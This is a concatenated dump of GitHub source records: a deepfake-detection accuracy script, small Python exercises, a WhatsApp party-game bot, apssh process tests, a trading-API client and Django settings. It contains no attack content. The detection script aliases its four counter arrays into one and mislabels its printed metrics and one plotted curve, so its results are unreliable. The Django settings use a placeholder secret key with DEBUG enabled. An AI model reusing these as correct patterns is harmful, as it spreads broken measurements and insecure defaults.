curve\")\n parser.add_argument('--acc-threshold', type=float, default=1.3, help = \"Threshold to use when generating ACC curve\")\n parser.add_argument('--accOn', action = 'store_false')\n parser.add_argument(\"--thresholds\", nargs=\"+\", default=[1.3,1.5])\n parser.add_argument(\"--window-sizes\", nargs=\"+\", default=[200,250])\n \n \n args = parser.parse_args()\n return args\n\n\n\ndef main():\n \n #This experiment will take a LONG time to run for all participants. \n #Running it for 1 participant takes a bit over an hour. \n \n args = parse_args()\n \n if not os.path.exists(args.save_dir):\n os.makedirs(args.save_dir)\n \n threshNum = len(args.thresholds)\n if args.num_participants >= 17:\n n = args.num_participants - 1\n else:\n n = args.num_participants\n \n if args.rocOn:\n tpResults = np.zeros((threshNum,3,n))\n fpResults = np.zeros((threshNum,3,n))\n \n if args.accOn:\n accResults = np.zeros((4,len(args.window_sizes),n))\n \n \n for i in range(args.num_participants):\n if i == 16:\n continue\n \n if i > 16:\n person = i -1\n else:\n person = i\n \n if args.accOn:\n accs = np.zeros((4, len(args.window_sizes)))\n \n data2 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake2-ID{i+1}.mat'))\n data3 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake3-ID{i+1}.mat'))\n data4 = loadmat(os.path.join(args.data_dir, f'mouth-data-fake4-ID{i+1}.mat'))\n \n fullLen = min(data2['cam1'].shape[0], data3['cam1'].shape[0], data4['cam1'].shape[0])\n \n cam1 = data3['cam1'][:fullLen,:]\n cam2 = data3['cam2'][:fullLen,:]\n cam3 = data3['cam3'][:fullLen,:]\n cam4 = data3['cam4'][:fullLen,:]\n cam5 = data3['cam5'][:fullLen,:]\n cam6 = data3['cam6'][:fullLen,:]\n \n #split into two thirds (fake, real, fake)\n intervalWin = fullLen // 3\n fake2 = np.vstack([data2['fake'][:intervalWin,:], \n cam2[intervalWin:(2*intervalWin),:], \n data2['fake'][(2*intervalWin):fullLen,:]])\n fake3 = np.vstack([data3['fake'][:intervalWin,:], \n cam3[intervalWin:(2*intervalWin),:], \n data3['fake'][(2*intervalWin):fullLen,:]])\n fake4 = np.vstack([data4['fake'][:intervalWin,:], \n cam4[intervalWin:(2*intervalWin),:], \n data4['fake'][(2*intervalWin):fullLen,:]])\n \n \n #Iterate over diffrent thresholds and window sizes\n threshes = args.thresholds\n window_sizes = args.window_sizes\n \n \n# =============================================================================\n# (1) TP if window contains a faked frame & fake is detected\n# (2) TN if window does not have fake & fake is not detected\n# (3) FP if window does not have fake & fake is detected\n# (4) FN if window contains a faked frame & fake is not detected\n# =============================================================================\n \n for ind, t in enumerate(threshes):\n for ind2, j in enumerate(window_sizes):\n numWin = fullLen - j\n acc0 = acc1 = acc2 = acc3 = np.zeros((4,numWin))\n for start in range(fullLen):\n end = start + j\n if end > fullLen-1:\n continue\n \n numFakes0, numFakes1, numFakes2, numFakes3, c1, c2, c3 = onlyPCA(cam1, cam2, cam3, cam4, cam5, cam6, fake2, \n fake3, fake4, start, end, args.num_pcs, t)\n \n isFake = (len(set(range(start, end)).intersection(set(range(intervalWin, 2*intervalWin)))) == 0)\n \n #0 fakes case\n if numFakes0 ==0:\n acc0[1][start] = 1 \n else:\n acc0[2][start] = 1\n \n \n #1 fake case\n if numFakes1 ==1:\n if isFake==0:\n acc1[2][start] = 1\n else:\n if (np.all(c1 == np.array([1,1,1,2,1,1])) or np.all(c1 == np.array([2,2,2,1,2,2]))):\n acc1[0][start] = 1\n else:\n acc1[3][start] = 1\n elif numFakes1 > 1:\n acc1[2][start] = 1\n else:\n if isFake == 0:\n acc1[1][start] = 1\n else:\n acc1[3][start] = 1\n \n #2 fakes case\n if numFakes2 ==2:\n if isFake==0:\n acc2[2][start] = 1\n else:\n if (np.all(c2 == np.array([1,1,2,2,1,1])) or np.all(c2 == np.array([2,2,1,1,2,2]))):\n acc2[0][start] = 1\n else:\n acc2[3][start] = 1\n elif ((numFakes2 == 1) or (numFakes2 > 2)):\n acc2[2][start] = 1\n else:\n if isFake == 0:\n acc2[1][start] = 1\n else:\n acc2[3][start] = 1\n \n #3 fakes case\n \n if numFakes3 ==3:\n if isFake==0:\n acc3[2][start] = 1\n else:\n if (np.all(c3 == np.array([1,2,2,2,1,1])) or np.all(c3 == np.array([2,1,1,1,2,2]))):\n acc3[0][start] = 1\n else:\n acc3[3][start] = 1\n elif ((numFakes3 == 1) or (numFakes3 == 2) or (numFakes3 > 3)):\n acc3[2][start] = 1\n else:\n if isFake == 0:\n acc3[1][start] = 1\n else:\n acc3[3][start] = 1\n \n print(f'Window Start: {start}')\n \n print(f'ID: {i}. Threshold: {t}. Window size: {j}.'\n f'TP: {np.mean(acc0, axis = 1)}. TN: {np.mean(acc1, axis = 1)}.'\n f'FP: {np.mean(acc2, axis = 1)}. FN: {np.mean(acc3, axis = 1)}.')\n \n if (args.rocOn and j == args.roc_window_size):\n tpResults[ind,0,person] = np.sum(acc1[0,:]) / (np.sum(acc1[0,:]) + np.sum(acc1[3,:]) + 1e-7)\n tpResults[ind,1,person] = np.sum(acc2[0,:]) / (np.sum(acc2[0,:]) + np.sum(acc2[3,:]) + 1e-7)\n tpResults[ind,2,person] = np.sum(acc3[0,:]) / (np.sum(acc3[0,:]) + np.sum(acc3[3,:]) + 1e-7)\n \n fpResults[ind,0,person] = np.sum(acc1[2,:]) / (np.sum(acc1[2,:]) + np.sum(acc1[1,:]) +1e-7)\n fpResults[ind,1,person] = np.sum(acc2[2,:]) / (np.sum(acc2[2,:]) + np.sum(acc2[1,:])+ 1e-7)\n fpResults[ind,2,person] = np.sum(acc3[2,:]) / (np.sum(acc3[2,:]) + np.sum(acc3[1,:])+ 1e-7)\n\n if (args.accOn and t == args.acc_threshold):\n \n accs[0,ind2] = (np.sum(acc0[0,:]) + np.sum(acc0[1,:])) / (np.sum(acc0[0,:]) + np.sum(acc0[1,:]) + np.sum(acc0[2,:]) + np.sum(acc0[3,:]))\n accs[1,ind2] = (np.sum(acc1[0,:]) + np.sum(acc1[1,:])) / (np.sum(acc1[0,:]) + np.sum(acc1[1,:]) + np.sum(acc1[2,:]) + np.sum(acc1[3,:]))\n accs[2,ind2] = (np.sum(acc2[0,:]) + np.sum(acc2[1,:])) / (np.sum(acc2[0,:]) + np.sum(acc2[1,:]) + np.sum(acc2[2,:]) + np.sum(acc2[3,:]))\n accs[3,ind2] = (np.sum(acc3[0,:]) + np.sum(acc3[1,:])) / (np.sum(acc3[0,:]) + np.sum(acc3[1,:]) + np.sum(acc3[2,:]) + np.sum(acc3[3,:]))\n \n if args.accOn:\n accResults[:,:,person] = accs\n \n if args.rocOn:\n meanTP = np.mean(tpResults, axis = 2) \n meanFP = np.mean(fpResults,axis = 2)\n stdTP = np.std(tpResults,axis = 2)\n stdFP = np.std(fpResults,axis = 2)\n \n oneFake = np.array([meanFP[:,0],meanTP[:,0] ])\n twoFake = np.array([meanFP[:,1],meanTP[:,1] ])\n threeFake = np.array([meanFP[:,2],meanTP[:,2] ])\n \n oneFake = oneFake[oneFake[:,1].argsort()]\n twoFake = twoFake[twoFake[:,1].argsort()]\n threeFake = threeFake[threeFake[:,1].argsort()]\n \n plt.errorbar(oneFake[:,0],oneFake[:,1], stdTP[:,0],stdFP[:,0], label = 'One Fake')\n plt.errorbar(twoFake[:,0],twoFake[:,1], stdTP[:,1],stdFP[:,1], label = 'Two Fakes')\n plt.errorbar(twoFake[:,0],twoFake[:,1], stdTP[:,2],stdFP[:,2], label = 'Three Fakes')\n plt.xlabel(\"False Positive Rate\")\n plt.ylabel(\"True Positive Rate\")\n plt.xlim([0,1])\n plt.ylim([0,1])\n plt.legend()\n plt.title(f\"ROC Curve. Window size = {args.roc_window_size}\")\n plt.savefig(os.path.join(args.save_dir, f\"roc_window_size_{args.roc_window_size}.jpg\"))\n \n \n if args.accOn:\n meanRes = np.mean(accResults,axis = 2)\n stdRes = np.std(accResults,axis = 2)\n \n plt.errorbar(args.window_sizes, meanRes[0,:], yerr = stdRes[0,:], label = \"No Fakes\")\n plt.errorbar(args.window_sizes, meanRes[1,:],yerr = stdRes[1,:], label = \"One Fake\")\n plt.errorbar(args.window_sizes, meanRes[2,:], yerr = stdRes[2,:],label = \"Two Fakes\")\n #plt.plot(args.window_sizes, meanRes[3,:], label = \"Three Fakes\")\n plt.xlim([min(args.window_sizes),max(args.window_sizes) + 50])\n plt.ylim([0,1])\n plt.xlabel(\"Window Size\")\n plt.ylabel(\"Accuracy\")\n plt.title(f\"Detection Accuracy vs. Window Size with Threshold = {args.acc_threshold}\")\n plt.legend()\n plt.savefig(os.path.join(args.save_dir, f\"acc_vs_window_size_thresh{args.acc_threshold}.jpg\"))\n \n \n\nif __name__ == \"__main__\":\n main()\n \n\n","repo_name":"brownvc/social-video-verification-hackathon","sub_path":"code/window_acc_exp.py","file_name":"window_acc_exp.py","file_ext":"py","file_size_in_byte":14158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17330299344","text":"# -*- coding: utf-8 -*-\nwhile True:\n s = 0\n qtde = 0\n while qtde < 2:\n n = float(input())\n if n<=10 and n>=0:\n s += n\n qtde += 1\n else:\n print(\"nota invalida\")\n print(\"media = %.2f\"%(s/2))\n denovo = 0\n while True:\n print(\"novo calculo (1-sim 2-nao)\")\n denovo = int(input())\n if denovo==1 or denovo==2:\n break\n if denovo==2:\n break\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1118.py","file_name":"1118.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73851874067","text":"import pygame\nimport sys\nfrom Game import Game\n\n\nclass Controller:\n def __init__(self, game: Game):\n self.game = game\n\n def get_and_handle_events(self):\n events = pygame.event.get()\n self.exit_if_time_to_quit(events)\n print(events) # Only for testing\n\n @staticmethod\n def exit_if_time_to_quit(events):\n for event in events:\n if event.type == pygame.QUIT:\n sys.exit()\n","repo_name":"RHIT-CSSE/csse120-public","sub_path":"PythonProjects-Archived/99c-Model-View-Controller-Example/Stage2/Controller.py","file_name":"Controller.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11726044662","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom tkinter import messagebox\nfrom tkinter import *\nfrom classes import SMSPlayer, show_phone_number\nfrom game_class import Game\nimport json\nimport random\nfrom whatsapp.commands import commands\nfrom whatsapp.whatsapp_manager import send_message, get_user\nfrom flask import Flask, request\nfrom threading import Thread\nimport os\nfrom utils import clear_frame, VerticalScrolledFrame\n\n\nclass WhatsAppGame(Game):\n def __init__(self, game_master: bool = None):\n self.receive = True\n self.send_messages = []\n self.server = app = Flask(__name__)\n # Start the NodeJs process to manage the whatsapp connection and get the logs from the process in a thread\n # Detect if there is a node_modules folder\n if not os.path.isdir(\"whatsapp/api/node_modules\"):\n print(\"Installation des dépendances de WhatsApp\")\n os.system(\"cd whatsapp/api && npm install\")\n self.whatsapp_manager = Thread(target=lambda: os.system(\"cd whatsapp/api && node index.js\"))\n self.whatsapp_manager.start()\n\n self.is_ready = False\n\n @app.post(\"/qr\")\n def qr():\n print(\"Please scan the QR code below to authenticate.\")\n return \"OK\", 200\n\n @app.post(\"/authenticated\")\n def authenticated():\n return \"OK\", 200\n\n @app.post(\"/auth_failure\")\n def auth_failure():\n return \"OK\", 200\n\n @app.post(\"/ready\")\n def ready():\n print(\"WhatsApp is ready\")\n if not self.pause: \n if self.import_window is not None:\n self.is_ready = True\n else: \n messagebox.showinfo(\"Bienvenue\", \"Bienvenue dans le jeu \" + self.config[\"names\"][\"title\"] + \"\\n\" +\n \"Une nouvelle partie va commencer.\\n\" +\n \"Êtes-vous prêt à jouer ?\")\n self.start_game()\n else:\n self.unpause_game()\n return \"OK\", 200\n\n @app.post(\"/message\")\n def message():\n data = request.json[\"data\"]\n if len(data[\"from\"]) > 16:\n return \"OK\", 200\n joueur = next((player for player in self.players if\n player.phone.replace(\"+\", \"\") == data[\"from\"].replace(\"@c.us\", \"\")), None)\n if self.import_window is not None:\n if self.register_code in data[\"body\"]:\n if joueur is not None:\n return self.send_info(joueur, \"Vous êtes déjà enregistré dans la partie !\")\n new_player = {\n \"type\": \"sms\",\n \"name\": data['_data']['notifyName'], \n \"phone\": f\"+{data['from'].replace('@c.us', '')}\",\n \"play\": True,\n }\n player = SMSPlayer(new_player[\"name\"], new_player[\"phone\"], self.used_passwords, self.used_id)\n self.players.append(player)\n if self.config[\"save_register\"]:\n \n players = []\n if os.path.exists(\"players.json\"):\n with open(\"players.json\", \"r\", encoding=\"utf-8\") as file:\n players = json.load(file)\n players.append(new_player)\n with open(\"players.json\", \"w\", encoding=\"utf-8\") as file:\n json.dump(players, file, indent=4, ensure_ascii=False)\n self.send_info(player, \"Vous êtes bien entré dans la partie !\")\n self.import_players()\n return True\n if len(data[\"from\"]) > 16:\n return \"OK\", 200\n joueur = next((player for player in self.players if\n player.phone.replace(\"+\", \"\") == data[\"from\"].replace(\"@c.us\", \"\")), None)\n if not self.check_command(joueur, data):\n string = \"Nouveau message de \" + joueur.get_name() + \" (\" + joueur.phone + \") :\\n\"\n string += data[\"body\"]\n messagebox.showinfo(f\"Message de {data['_data']['notifyName']}\", string)\n return \"OK\", 200\n\n @app.post(\"/disconnected\")\n def disconnected():\n self.pause = True\n self.pause_reason = \"WhatsApp s'est déconnecté\"\n self.set_pause_game()\n messagebox.showerror(\"Erreur\", \"WhatsApp s'est déconnecté.\\nMerci de bien vouloir vérifier votre connexion.\")\n return \"OK\", 200\n\n @app.post(\"/media_uploaded\")\n def media_uploaded():\n print(request.json)\n return \"OK\", 200\n\n @app.post(\"/message_reaction\")\n def message_reaction():\n print(request.json)\n return \"OK\", 200\n\n self.flt = flt = Thread(target=lambda: app.run(port=3046, debug=False))\n flt.daemon = True\n flt.start()\n\n super().__init__(game_master)\n\n def import_players(self):\n used_passwords: list = []\n used_id: list = []\n if self.config[\"register_type\"] == \"liste\": \n with open(\"players.json\", \"r\", encoding='utf-8') as f:\n data = json.load(f)\n self.players = [SMSPlayer(player[\"name\"], player[\"phone\"], used_passwords, used_id)\n for player in data if player.get(\"play\", True) and player.get(\"type\", \"\") == \"sms\"]\n else:\n already_started: bool = self.import_window is not None\n if self.import_window:\n clear_frame(self.import_window)\n popup = self.import_window\n else:\n self.import_window = popup = Tk()\n popup.title(\"Importation des joueurs\")\n popup.geometry(\"300x200\")\n popup.resizable(True, True)\n popup.iconbitmap(self.path + \"/assets/img/amongus.ico\")\n popup.state(\"zoomed\")\n self.register_code = \"\".join([str(random.randint(0, 9)) for _ in range(5)])\n \n def start_game() -> None:\n \"\"\"\n Démarre la partie, une fois que les joueurs sont importés\n :return: None\n \"\"\"\n self.import_window = None\n self.players = [player for player in self.players if player is not None]\n popup.destroy()\n self.register_code = None\n self.start_game()\n return None\n \n def closing():\n \"\"\"\n Fonction de fermeture de la fenêtre\n \"\"\"\n if messagebox.askokcancel(\"Quitter\", \"Êtes vous sûr de quitter ?\"):\n popup.destroy()\n self.window.destroy()\n \n popup.protocol(\"WM_DELETE_WINDOW\", closing)\n \n main_frame = Frame(popup)\n \n qrcode_frame = Frame(main_frame)\n \n whatsapp_user = get_user()\n \n url_label = Label(qrcode_frame, text=f\"Envoyez {self.register_code} à {show_phone_number(whatsapp_user['wid'])} pour vous enregistrer\", font=(\"Arial\", 28))\n url_label.pack()\n \n qrcode_frame.pack(fill=BOTH, expand=True)\n \n valid_players = [player for player in self.players if player is not None]\n \n start_button = Button(main_frame, text=\"Démarrer la partie\", command=start_game)\n \n if len(valid_players) < 4:\n start_button.config(state=DISABLED)\n \n start_button.pack()\n \n import_players_frame = VerticalScrolledFrame(main_frame)\n \n for player in valid_players:\n player_frame = Frame(import_players_frame)\n \n player_label = Label(player_frame, text=player.get_name(), font=(\"Arial\", 28))\n player_label.pack()\n \n player_frame.pack(fill=BOTH, expand=True)\n \n import_players_frame.pack(fill=BOTH, expand=True)\n \n main_frame.pack(fill=BOTH, expand=True)\n \n if not already_started:\n popup.mainloop()\n print(\"Joueurs importés\")\n\n def send_info_all(self, message: str):\n print(\"Envoie de l'information\")\n for player in self.players:\n new_message = message.replace(\"{name}\", player.name)\n # replace the variable in the message\n new_message = new_message.replace(\"{role}\", self.config[\"names\"][player.role])\n new_message = new_message.replace(\"{id}\", player.id)\n new_message = new_message.replace(\"{phone}\", player.phone)\n new_message = new_message.replace(\"{tasks}\", \"\\n\".join([task.name for task in player.tasks]))\n new_message = new_message.replace(\"{password}\", player.password)\n\n print(player.name, \":\", new_message)\n send_message(player.phone, new_message)\n\n def send_info(self, player: SMSPlayer, message: str):\n print(player.name, \":\", message)\n send_message(player.phone, message)\n\n def send_role(self, player) -> None:\n \"\"\"\n Envoie un sms au joueur indiquant son role et ses tâches\n :param player: SMSPlayer: Le joueur avec son numéro de téléphone\n \"\"\"\n message = f\"Bonjour {player.get_name()},\\n\"\n message += \"Vous êtes un \" + self.config[\"names\"][player.role].upper()\n if player.role == \"impostor\" and len(self.impostors) > 1:\n impostors = \" \".join([(joueur.get_name()) for joueur in self.impostors])\n message += \" avec \" + impostors + \"\\n\\n\"\n else:\n message += \"\\n\\n\"\n message += \"Vos tâches sont:\\n\"\n for i in range(len(player.tasks)):\n task = player.tasks[i]\n message += f\"{i + 1}: {task.name} ({task.steps} étapes)\\n\"\n message += \"\\n\"\n message += f\"Votre identifiant est {player.id}\\n\"\n message += \"\\n\"\n message += \"Pour voir toutes les commandes, vous pouvez taper \\\"help\\\"\\n\"\n message += \"Nous vous souhaitons une bonne partie !\"\n\n self.send_messages.append(message)\n self.send_info(player, message)\n\n def check_command(self, player, message: dict) -> bool:\n \"\"\"\n Vérifie si jamais le content reçu est une commande ou un content validant une tâche. Si c’est le cas, on l'exécute\n :param player: SMSPlayer: Le joueur qui a envoyé le content\n :param message: str: le contenu du content reçu\n :return: bool: Si jamais le content était bien une commande\n \"\"\"\n content = message[\"body\"].lower()\n for cmd in commands:\n if content.startswith(tuple([cmd.name] + cmd.aliases)):\n return cmd.run(player, content, message, self)\n if self.unpause_code in content and self.pause:\n self.unpause_game()\n return True\n for task in player.tasks:\n if task.type == \"validate_basic\":\n for word in task.keywords:\n if word in content:\n self.task_done(player, task)\n return True\n elif task.type == \"activate_basic\":\n for word in task.activ_keywords:\n if word in content:\n send_message(player.phone, f\"La tâche {task.name} vous envoie:\\n{task.message}\")\n task.active = True\n return True\n elif task.type == \"activ_valid\":\n for word in task.keywords:\n if word in content:\n if task.active:\n self.task_done(player, task)\n send_message(player.phone, \"Vous avez bien validé la tâche !\")\n return True\n else:\n send_message(player.phone, \"La tâche n'est pas encore activée\")\n return True\n for word in task.activ_keywords:\n if word in content:\n send_message(player.phone, f\"La tâche {task.name} vous envoie:\\n{task.message}\")\n task.active = True\n return True\n\n return False\n\n\nif __name__ == '__main__':\n WhatsAppGame(True)\n","repo_name":"Merlode11/Among-Us-Real","sub_path":"whatsapp/whatsapp_game_class.py","file_name":"whatsapp_game_class.py","file_ext":"py","file_size_in_byte":12507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12533416020","text":"\"\"\"\nNeurodataLab LLC 09.12.2019\nCreated by Andrey Belyaev\n\"\"\"\nimport argparse\nfrom ndlapi.api import create_credentials, get_service_by_name, images_services_list\nfrom streaming_processing import WebCamFaceDetectorStreamProcessing\n\n\ndef parse():\n \"\"\"\n Parse command line arguments\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--keys-path', required=True, type=str,\n help='Path to folder with keys downloaded from api.neurodatalab.dev')\n parser.add_argument('--service', required=True, type=str,\n help='Service to process video. Available services: %s' % str(images_services_list))\n return parser.parse_args()\n\n\nif __name__ == '__main__':\n # Parse command line arguments\n args = parse()\n\n # Check service type. This example works only with Face Detector\n assert args.service in ('FaceDetector', 'fd'), 'Only Face Detector service is available in example'\n\n # Create ssl authorization token\n ssl_auth = create_credentials(args.keys_path)\n # Create service\n service = get_service_by_name(args.service, ssl_auth)\n\n # Initialize webcam streaming class\n webcam_streamer = WebCamFaceDetectorStreamProcessing(service)\n # Start streaming\n webcam_streamer.start_streaming()\n","repo_name":"NeurodataLab/ndlapi-streaming-exercise","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1285,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"3334191605","text":"# pylint: disable=c0111\n\nimport unittest\n\nfrom asynciojobs import Scheduler\n\nfrom apssh import SshJob, LocalNode, Run, RunScript, RunString, SshNode\nfrom apssh import HostFormatter, load_private_keys, CommandFailedError\n\n#from apssh.util import co_close_ssh_from_sched\n\nfrom . import util\n#from . import utilps\n\nclass Tests(unittest.TestCase):\n\n def _allowed_signal(self, allowed_exits,\n host=\"localhost\", username=None):\n\n print(f\"Testing allowed signal allowed_exits={allowed_exits}\")\n\n # global timeout\n total = 4\n # scheduled duration\n long = 2\n # send signal after that amount\n short = 1\n # we always kill with TERM\n signal = \"TERM\"\n\n if username is None:\n username = util.localuser()\n node = SshNode(host, username=username)\n\n scheduler = Scheduler(timeout = total, critical=False)\n SshJob(node=node, scheduler=scheduler,\n command=Run(f\"sleep {long}\",\n allowed_exits=allowed_exits))\n SshJob(node=node, scheduler=scheduler,\n command=f\"sleep {short}; pkill -{signal} sleep\")\n\n expected = signal in allowed_exits\n\n run = scheduler.run()\n scheduler.list()\n self.assertEqual(run, expected)\n\n def test_allowed_signal_regular(self):\n self._allowed_signal(allowed_exits=[])\n def test_allowed_signal_term(self):\n self._allowed_signal(allowed_exits=['TERM'])\n def test_allowed_signal_term_mix(self):\n self._allowed_signal(allowed_exits=['TERM', 100])\n def test_allowed_signal_term_foreign(self):\n self._allowed_signal(allowed_exits=[100])\n\n\n\n def _allowed_retcod(self, allowed_exits,\n host=\"localhost\", username=None):\n\n print(f\"Testing allowed retcod allowed_exits={allowed_exits}\")\n\n # global timeout\n total = 4\n # scheduled duration\n long = 1\n # we always exit code 100\n retcod = 1000\n\n if username is None:\n username = util.localuser()\n node = SshNode(host, username=username)\n\n scheduler = Scheduler(timeout = total, critical=False)\n SshJob(node=node, scheduler=scheduler,\n command=Run(f\"sleep {long}; exit {retcod}\",\n allowed_exits=allowed_exits))\n\n expected = retcod in allowed_exits\n\n run = scheduler.run()\n scheduler.list()\n self.assertEqual(run, expected)\n\n def test_allowed_retcod_regular(self):\n self._allowed_retcod(allowed_exits=[])\n def test_allowed_retcod_term(self):\n self._allowed_retcod(allowed_exits=[100])\n def test_allowed_retcod_term_mix(self):\n self._allowed_retcod(allowed_exits=['TERM', 100])\n def test_allowed_retcod_term_foreign(self):\n self._allowed_retcod(allowed_exits=[100])\n","repo_name":"parmentelat/apssh","sub_path":"tests/test_processes.py","file_name":"test_processes.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"71813682066","text":"#!/usr/bin/env python\n# SpaceTime Class\n\"\"\" Each SpaceTime will be like an alternate timeline of the current\n running game. Most of the time I'm guessing I'll handle one (or even none),\n but I want this to be the class responsible for handling the timeline, splitting,\n rewinding and all the events that occur in the world should probably be logged\n in the SpaceTime continuum. Mmmm... continuum.\n\n\"\"\"\nfrom game.libs import *\nfrom game.classes import *\nimport time\nfrom game.classes.basics import PhysicalWorld\nfrom game.classes.elements.Wall import Wall\nfrom game.classes.elements.Atom import Atom\nfrom game.classes.elements.Energy import Energy\nfrom game.classes.elements.Charge import Charge\nfrom game.classes.elements.Player import Player\n\nclass SpaceTime:\n def __init__(self, GameObject):\n self._Game = GameObject\n self._id = make_hash()\n self._PhysicalWorld = PhysicalWorld()\n self._PhysicalWorld.set_collision_handler(begin=self.collision_begin_func, pre_solve=self.collision_pre_solve_func)\n\n self._teams = {}\n self._players = {}\n self._objects = []\n self._visible_objects = []\n self._prev_step_time = 0\n self._curr_step_time = 0\n self._events_dict = {0:'init'}\n\n def _get_PhysicalWorld(self):\n return self._PhysicalWorld\n\n def _set_PhysicalWorld(self, PhysicalWorldObject):\n if isinstance(PhysicalWorldObject, PhysicalWorld):\n self._PhysicalWorld = PhysicalWorldObject\n\n PhysicalWorld = property(_get_PhysicalWorld, _set_PhysicalWorld)\n\n def get_teams(self):\n return self._teams\n\n def get_players(self):\n return self._players\n\n def get_visible_objects(self):\n return self._visible_objects\n\n def get_objects(self):\n return self._objects\n\n def step(self, step):\n self._prev_step_time = self._curr_step_time\n self._curr_step_time = step\n self._PhysicalWorld.step(step)\n return self._prev_step_time\n\n def collision_begin_func(self, space, arbiter, *args):\n # self.collision_pre_solve_func(space, arbiter, args, register=False)\n return True\n\n def collision_pre_solve_func(self, space, arbiter, *args, **kwargs):\n \"\"\"For each contact, register the collision and figure\n out what to do. \"\"\"\n GameObjects = []\n EnergyObjects = []\n ChargeObjects = []\n AtomObjects = []\n if 'register' in kwargs:\n register = kwargs['register']\n else:\n register = True\n for shape in arbiter.shapes:\n if hasattr(shape, 'game_object'):\n game_object = shape.game_object\n GameObjects.append(game_object)\n if isinstance(game_object, Atom):\n AtomObjects.append(game_object)\n elif isinstance(game_object, Energy):\n EnergyObjects.append(game_object)\n elif isinstance(game_object, Charge):\n ChargeObjects.append(game_object)\n else:\n self._PhysicalWorld.remove(shape)\n\n\n if len(EnergyObjects) == 1 and len(AtomObjects) == 1:\n if register:\n self._Energy_Atom_collision_func(EnergyObjects[0], AtomObjects[0])\n return False\n\n if len(AtomObjects) == 2:\n if register:\n self._Atom_Atom_collision_func(AtomObjects)\n return True\n\n return True\n\n def _Energy_Atom_collision_func(self, EnergyObject, AtomObject):\n AtomObject.contact_Energy(EnergyObject)\n return False\n\n def _Atom_Atom_collision_func(self, AtomObjects):\n return True\n\n def new_Energy(self, PlayerObject, position, energy, **kwargs):\n EnergyObject = Energy(self._Game, PlayerObject, position, energy, **kwargs)\n self._objects.append(EnergyObject)\n self._visible_objects.append(EnergyObject)\n return EnergyObject\n\n def new_Atom(self, position, angle, skill, *args, **kwargs):\n AtomObject = Atom(self._Game, position, angle, skill, *args, **kwargs)\n self._objects.append(AtomObject)\n self._visible_objects.append(AtomObject)\n return AtomObject\n\n def new_Wall(self, a, b, thickness, **kwargs):\n WallObject = Wall(self._Game, a, b, thickness, **kwargs)\n self._objects.append(WallObject)\n self._visible_objects.append(WallObject)\n return WallObject\n\n def new_Player(self):\n PlayerObject = Player()\n id = PlayerObject.id\n self._players[ id ] = PlayerObject\n return PlayerObject\n\n def del_Element(self, ElementObject):\n if ElementObject in self._objects:\n self._objects.remove(ElementObject)\n if ElementObject in self._visible_objects:\n self._visible_objects.remove(ElementObject)","repo_name":"Maaack/SixX","sub_path":"code/game/classes/elements/SpaceTime.py","file_name":"SpaceTime.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"48"} +{"seq_id":"27022745941","text":"from neo_api_client import rest\nfrom neo_api_client import settings\nfrom neo_api_client.exceptions import ApiException\n\n\nclass ScripMasterAPI(object):\n def __init__(self, api_client):\n self.api_client = api_client\n self.rest_client = rest.RESTClientObject(api_client.configuration)\n\n def scrip_master_init(self, exchange_segment=None):\n URL = self.rest_client.configuration.get_url_details(\"scrip_master\")\n header_params = {'Authorization': \"Bearer \" + self.rest_client.configuration.bearer_token}\n\n try:\n scrip_report = self.rest_client.request(url=URL, method='GET', headers=header_params).json()[\"data\"]\n if exchange_segment:\n exchange_segment = settings.exchange_segment[exchange_segment]\n exchange_segment_csv = [file for file in scrip_report[\"filesPaths\"] if exchange_segment.lower() in file.lower()]\n if exchange_segment_csv:\n return exchange_segment_csv[0]\n else:\n return {\"Error\": \"Exchange segment not found\"}\n return scrip_report\n except ApiException as ex:\n return {\"error\": ex}\n","repo_name":"Kotak-Neo/kotak-neo-api","sub_path":"neo_api_client/api/scrip_master_api.py","file_name":"scrip_master_api.py","file_ext":"py","file_size_in_byte":1181,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"48"} +{"seq_id":"16514336261","text":"\"\"\"\nDjango settings for examenarium project.\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/2.0/topics/settings/\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/2.0/ref/settings/\n\"\"\"\n\nimport os\nimport django_heroku\n\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\n\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/2.0/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = \"CHANGE_ME!!!! (P.S. the SECRET_KEY environment variable will be used, if set, instead).\"\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nALLOWED_HOSTS = []\n\n# Application definition\nINSTALLED_APPS = [\n \"widget_tweaks\",\n \"material.admin\", # material\n \"material.admin.default\", # material\n # \"django.contrib.admin\",\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.messages\",\n \"django.contrib.staticfiles\",\n \"main\",\n \"homework\",\n \"media\",\n \"course\",\n \"swingtime\",\n 'social_django',\n]\n\n\nMIDDLEWARE = [\n \"django.middleware.security.SecurityMiddleware\",\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.middleware.common.CommonMiddleware\",\n \"django.middleware.csrf.CsrfViewMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n 